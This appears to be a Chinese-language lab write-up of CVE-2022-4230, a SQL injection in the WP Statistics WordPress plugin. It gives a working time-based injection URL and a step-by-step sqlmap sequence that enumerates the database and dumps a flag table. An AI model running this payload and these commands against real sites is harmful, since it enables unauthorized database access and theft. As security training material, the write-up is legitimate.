CVE-2022-4230

CVE-2022-4230

漏洞介绍

WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下,具有管理选项功能 (admin+) 的用户可以使用受影响的功能,但是该插件有一个设置允许低权限用户也可以访问它

知识补充

WordPress是一种CMS系统,在 WordPress 中,所有提交表单的数据都应包含一个 _wpnonce 字段,以防止未经授权的表单提交。Wordpress自己重写了路由规则,通过/wp-json/开头对内部的插件,主题等等进行访问,通过REST API来访问,每次都给发送一个_wpnonce来进行认证

概念验证

以具有查看 WP 统计权限的用户身份登录,并通过 https://example.com/wp-admin/admin-ajax.php?action=rest-nonce 获取一个 nonce,然后在以下 URL 中使用它,该 URL 将延迟 5 秒

里面的nonce需要通过返回的随机数值替换

复制代码
http://example.com/wp-json/wp-statistics/v2/metabox?_wpnonce=NONCE&name=words&search_engine=aaa%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)--%20HsBR

漏洞分析

https://www.cnblogs.com/F12-blog/p/18170169

开始实验

打开靶场空白一片

想想可以访问/wp-admin/admin-ajax.php?action=rest-nonce 来获得nonce,访问试试

good,回显个0,说明可能存在其他条件限制返回nonce,扫一扫

存在一个/readme.html,访问看看

存在一个登录界面,尝试登录

用户/密码:test/test

再次尝试 /wp-admin/admin-ajax.php?action=rest-nonce

成功返回随机数,修改nonce

访问

复制代码
/wp-json/wp-statistics/v2/metabox?_wpnonce=4d916dc27a&name=words&search_engine=aaa' AND (SELECT 5671 FROM (SELECT(SLEEP(5)))Mdgs)-- HsBR

抓包,使用sqlmap开始注入

查询当前数据库

复制代码
python sqlmap.py -r C:\Users\Administrator\Desktop\1.txt --batch --current-db

爆表

复制代码
python sqlmap.py -r C:\Users\Administrator\Desktop\1.txt --batch -D wordpress --tables

查询flag表后,发现flag字段,查询flag字段

复制代码
python sqlmap.py -r C:\Users\Administrator\Desktop\1.txt  -D wordpress -T flag -C flag --dump
相关推荐
AOwhisky9 小时前
Python 学习笔记(第一期与第二期)——基础语法——核心知识点自测与详解
开发语言·笔记·python·学习·云原生·运维开发
STLearner9 小时前
ICML 2026 | LLM×Graph论文总结[1]【图基础模型,文本属性图,多模态属性图,图对齐,图提示学习,关系深度学习
论文阅读·人工智能·python·深度学习·学习·机器学习·数据挖掘
什巳11 小时前
JAVA练习278- 和为 K 的子数组
java·学习·算法·leetcode
碎光拾影11 小时前
CPU与MCU核心区别揭秘
单片机·学习·51单片机
我命由我1234513 小时前
复利极简理解
经验分享·笔记·学习·职场和发展·求职招聘·职场发展·学习方法
AOwhisky14 小时前
Python 学习笔记(第三期)——流程控制核心知识点自测与详解
开发语言·笔记·python·学习·云原生·运维开发·流程控制
tyqtyq2214 小时前
药品说明书解读 —— AI 安全用药助手,鸿蒙原生应用深度解析
人工智能·学习·华为·生活·harmonyos
小心亦新15 小时前
STM32学习13 定时器1中断
stm32·嵌入式硬件·学习
我命由我1234515 小时前
72 法则极简理解
经验分享·笔记·学习·职场和发展·求职招聘·职场发展·学习方法
qq_263_tohua16 小时前
第112期 CNN学习,不错的文章
学习